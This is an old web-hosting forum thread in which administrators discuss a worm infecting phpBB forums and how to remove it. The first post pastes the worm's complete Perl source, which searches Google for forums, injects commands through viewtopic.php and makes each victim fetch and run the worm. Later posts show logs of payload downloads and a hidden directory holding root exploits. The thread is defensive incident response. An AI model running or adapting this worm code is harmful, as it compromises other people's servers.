Help - Search - Members - Calendar
Full Version: asw.txt ?
The Planet Forums > Control Panels > Plesk
sander815
Jan 2 2005, 06:25 AM
i have a lot of these entries in error_log

CODE
--02:27:52--  [url]http://chronologie4.com/phpBB2/asw.txt[/url]

          => `asw.txt.529'

Resolving chronologie4.com... done.

Connecting to chronologie4.com[65.77.211.120]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 3,341 [text/plain]



   0K ...                                                   100%   24.72 KB/s


what is this?

CODE
# asw:  anti santy worm

# this worm will try to fix any viewtopic.php on local box

# will use this box for 1 day to search other buggy phpBB forums, and end.



use strict;

use IO::Socket;

use IO::Handle;



sub fetch();

sub remote($);

sub http_query($);

sub encode($);



sub fetch(){

   my $rnd=(int(rand(9999)));

   my $n= 50;

   if ($rnd<5000) { $n<<=1;}

   my $s= (int(rand(10)) * $n);



   my @str=("%22Powered+by+phpBB%22+",

     "%22View+previous+topic+::+View+next+topic%22+",

     "%22post+new+topics+in+this+forum%22+",

     "%22reply+to+topics+in+this+forum%22+",

     "%22edit+your+posts+in+this+forum%22+",

     "%22delete+your+posts+in+this+forum%22+",

     "%22vote+in+polls+in+this+forum%22+",

     "%22Post+subject%22+phpBB+");



   my $query="www.google.com.ar/search?q=";

   $query.=$str[(rand(scalar(@str)))].$rnd;

   $query.="+-modules&num=$n&start=$s";



   my @lst=();

   my $page = http_query($query);

   while ($page =~  m/<a href="?http://([^>"]+)"?>/g){

    if ($1 !~ m/google|cache|translate/){

    push (@lst,$1);

    }

   }

   return (@lst);

}



sub http_query($){

   my ($url) = @_;

   my $host=$url;

   my $query=$url;

   my $page="";

   $host =~ s/href="?http:////;

   $host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;

   $query =~s/$host//;

   if ($query eq "") {$query="/";};

   eval {

    local $SIG{ALRM} = sub { die "1";};

    alarm 10;

    my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;

    print $sock "GET $query HTTP/1.0nHost: $hostnAccept: */*nUser-Agent: Mozilla/4.0nn ";

    my @r = <$sock>;

    $page="@r";

    alarm 0;

    close($sock);

   };    

   return $page;



}



sub encode($) {

   my $s = shift;

   $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;

   $s =~ s/%252E$//;

   return $s;

}





if (-e "log.txt") {exit;}

eval {fork and exit;};



$|++;

open LOG,">>log.txt";

autoflush LOG 1;

srand;

my $iam=$ARGV[0];

my $oneday=time+86400;

my $page="";

my @urls;

my $url;





## first fix viewtopic to aviod future attacks

my @in=`find / -name  "viewtopic.php" 2>/dev/null`;

foreach my $f (@in){

   chop $f;

   my $newvt="";

   if (open FIX,"<$f") {

    print LOG "nReading: $f ";

    while (<FIX>){

    $newvt.=$_;

    }

    close FIX;

    $newvt =~ s/urldecode//;

    if (open FIX,">$f"){

    print FIX $newvt;

    close FIX;

    print LOG " <--Fixed";

    }

   }

}

print LOG "n";





while(time<$oneday){

   @urls=fetch();

   foreach $url (@urls) {

    if ($url !~ /viewtopic.php/) {next;}

    $url =~ s/(.*/viewtopic.php?[t|p]=[0-9]+).*/$1/;

    print LOG "chk ".$url." ";

    my $cmd=encode("perl -e "print q(jSVowMsd)"");

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

    if ( $page =~ /jSVowMsd/ ){

    $url =~ s/&highlight.*//;

    my $upload=$url;

    $upload =~ s/viewtopic.*//;

    print LOG ">bug viewtopic found ";

    $cmd="wget $iam/$0; perl $0 $upload;";    # set cmd

    $cmd=encode("$cmd");    # set cmd

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

   

    $cmd="cd /tmp; wget $iam/$0; perl $0 $iam;";    # set cmd

    $cmd=encode("$cmd");    # set cmd

    $url =~ s/&highlight.*//;

    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";

    $page = http_query($url);

    print LOG ">donen";

    }

    else {

    print LOG ">viewtopic okn";

    }

   }

}

close LOG;
sander815
Jan 2 2005, 06:38 AM
files end up in /tmp: asw.txt till asw.txt.899

in /tmp theres also a log file:
CODE
chk forums.tolkienonline.com/viewtopic.php?t=56528 >viewtopic ok

chk [url]www.lushforums.com/viewtopic.php?p=193141[/url] >viewtopic ok

chk [url]www.gamerpub.com/phpBB2/viewtopic.php?p=4504[/url] >viewtopic ok

chk [url]www.ueoclan.com/forums/viewtopic.php?p=25675[/url] >viewtopic ok

chk forums.kingdomofloathing.com/viewtopic.php?t=11161 >viewtopic ok

chk [url]www.xmfan.com/viewtopic.php?p=118348[/url] >viewtopic ok

chk [url]www.macnet2.com/phpBB2/viewtopic.php?p=1459[/url] >viewtopic ok

chk [url]www.autosupplyuk.com/forums/viewtopic.php?p=1459[/url] >viewtopic ok
Squire
Jan 2 2005, 07:39 AM
It's a rather nasty virus affecting some versions of PHPBB.

For more details: http://www.zone-h.org/en/news/read/id=4440
davily
Jan 2 2005, 07:58 AM
is there any threat to the rest of the server because of this or only the site running PHPBB?

I have them too and am currently tracking down which user it is
sander815
Jan 2 2005, 10:09 AM
how can i stop it?
mount /tmp with noexec?
Squire
Jan 2 2005, 12:35 PM
Have your customers upgrade their PHPBB installtion if they're running a version of PHPBB that is prior to 2.0.11. That version is supposedly safe from the exploit.

Or barring that, a fix for the viewtopic bug for this bulletin board software is located here .

Squire
davily
Jan 2 2005, 01:02 PM
Thanks for the code update. I am in the middle of performing the necessary code change and also having them upgrade to 2.0.11, but I am rather concerned about the security of the box as a whole....is there any risk in a malicious user doing more than corrupting the site that has phpbb? I also see the following in my http log

--08:12:22-- http://67.19.194.20/%7Estorm/system
=> `system'
Connecting to 67.19.194.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,519 [text/plain]

0K .......... .......... ...... 100% 1.14 MB/s

08:12:22 (1.14 MB/s) - `system' saved [27519/27519]

sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found
sh: line 1: IRC: command not found

Is it related? and my tmp directory now has a '.tmp' within it. I have run rkhunter and it doesn't find any issues. Is it anything to worry about?

[root@ root]# cd /tmp/.tmp
[root@.tmp]# ls -l
total 580
-rwxrwxrwx 1 apache apache 18132 Nov 13 14:50 f3
-rwxrwxrwx 1 apache apache 19414 Nov 13 14:51 mremap2
-rwxrwxrwx 1 apache apache 14936 Nov 13 14:55 ptrace24
drwx------ 2 apache apache 4096 Jan 2 09:48 tmp
-rw------- 1 apache apache 51200 Dec 25 01:30 tmp.tgz
-rwxr-xr-x 1 apache apache 468689 Nov 13 14:56 w00t
[root@ .tmp]# cd tmp
[root@ tmp]# ls -l
total 52
-rwxrwxrwx 1 apache apache 43932 Dec 22 04:29 bash
-rw------- 1 apache apache 992 Dec 22 04:30 bash.conf
-rw------- 1 apache apache 6 Dec 26 21:46 pid.bash
sander815
Jan 2 2005, 01:19 PM
try chmodding these:

chmod 750 /usr/bin/rcp
chmod 750 /usr/bin/wget
chmod 750 /usr/bin/lynx
chmod 750 /usr/bin/links
chmod 750 /usr/bin/scp

so they are unable to run wget to get the files
davily
Jan 2 2005, 04:41 PM
another weird item.....when I do a ls -al on /tmp I get this output

[root@ tmp]# ls -al |more
total 31164
drwxrwxrwt 8 root root 102400 Jan 2 17:37 .
drwx------ 4 apache apache 4096 Jan 1 21:49 .
drwxr-xr-x 20 root root 4096 Jan 2 16:37 ..

The second. doesn't look right Can someone explain how it is showing the two?

Thanks
covici
Jan 6 2005, 06:55 AM
Hi. What is rkhunter -- some kind of rootkit finder and where can I get it?

Thanks.
davily
Jan 6 2005, 12:24 PM
QUOTE
Originally posted by covici
Hi.  What is rkhunter -- some kind of rootkit finder and where can I get it?

Thanks.


rootkit.nl

Also to update on the additional directory owned by apache.

to cd into it you run the following command

#cd ". "

(dot with 5 spaces in quotes.)

I stopped replying in this thread and opened one in security. You should go there to get the rest of your questions answered.

Hope that helps

Regards
Paul_Watson
May 9 2006, 12:11 PM
A directory was created using spaces most likely. Try: cd '.[space]' or cd '.[space][space]' and similar. Also try doing an 'ls -alF' which will append a trailing / after the directory name and will indicate how many spaces.

QUOTE (davily)
another weird item.....when I do a ls -al on /tmp I get this output

[root@ tmp]# ls -al |more
total 31164
drwxrwxrwt    8 root     root       102400 Jan  2 17:37 .
drwx------    4 apache   apache       4096 Jan  1 21:49 .
drwxr-xr-x   20 root     root         4096 Jan  2 16:37 ..

The second. doesn't look right Can someone explain how it is showing the two?

Thanks
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2009 Invision Power Services, Inc.